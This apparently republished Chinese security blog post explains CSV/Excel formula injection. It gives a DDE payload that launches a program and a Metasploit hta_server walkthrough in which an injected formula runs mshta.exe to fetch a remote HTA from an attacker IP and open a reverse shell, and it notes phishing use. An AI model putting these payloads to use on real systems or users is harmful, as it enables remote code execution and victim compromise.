前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >CSV注入之RCE&社工钓鱼

CSV注入之RCE&社工钓鱼

作者头像
Al1ex
发布2021-09-01 15:18:27
1.4K0
发布2021-09-01 15:18:27
举报
文章被收录于专栏:网络安全攻防网络安全攻防
漏洞介绍

CSV公式注入(CSV Injection)是一种会造成巨大影响的攻击向量,攻击这可以向Excel文件中注入可以输出或以CSV文件读取的恶意攻击载荷,当用户打开Excel文件时,文件会从CSV描述转变为原始的Excel格式,包括Excel提供的所有动态功能,在这个过程中,CSV中的所有Excel公式都会执行,当该函数有合法意图时,很易被滥用并允许恶意代码执行。

漏洞复现
简易测试

在Office的"文件->选项->信任中心"处开启"启用动态数据交换服务器启动"功能:

之后构造以下恶意载荷:

代码语言:javascript
复制
=1+cmd|' /C calc'!A0

之后模拟用户打开Excel文件:

发现载荷成功执行:

反弹Shell

这里使用MSF框架来实施攻击:

代码语言:javascript
复制
use exploit/windows/misc/hta_server
msf exploit(windows/misc/hta_server) > set srvhost 192.168.174.129
msf exploit(windows/misc/hta_server) > exploit

之后在Excel中插入恶意载荷

代码语言:javascript
复制
=1+cmd|' /C mshta.exe http://192.168.174.129:8888/Agd7QT.hta'!A0

保存之后发送给其他用户:

当用户打开时在MSF端成功上线:

文末小结

CSV注入时常出现在数据导出功能部分,例如:将当前表格数据导出到Excel,此时攻击者可以在当前表格中插入恶意代码,之后当用户导出当前表格数据并保存为Excel,再次打开Excel时便会导致恶意载荷执行,同时CSV注入也可以用于钓鱼,攻击者可以精心构造一个富含大量数据的Excel并插入恶意代码,诱导受害者用户访问并查看,从而触发恶意代码~

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2021-08-26,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 七芒星实验室 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 漏洞介绍
  • 漏洞复现
    • 简易测试
      • 反弹Shell
      相关产品与服务
      文件存储
      文件存储(Cloud File Storage,CFS)为您提供安全可靠、可扩展的共享文件存储服务。文件存储可与腾讯云服务器、容器服务、批量计算等服务搭配使用,为多个计算节点提供容量和性能可弹性扩展的高性能共享存储。腾讯云文件存储的管理界面简单、易使用,可实现对现有应用的无缝集成;按实际用量付费,为您节约成本,简化 IT 运维工作。
      领券
      问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档